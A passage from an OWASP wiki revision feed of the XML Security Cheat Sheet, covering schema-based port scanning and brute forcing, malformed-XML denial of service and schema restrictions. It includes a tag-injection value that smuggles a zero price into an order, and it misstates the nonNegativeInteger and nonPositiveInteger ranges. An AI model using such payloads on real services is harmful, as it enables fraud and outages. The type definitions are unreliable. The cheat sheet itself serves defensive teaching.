Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224420</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224420"/>
				<updated>2016-12-21T20:05:10Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
 &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
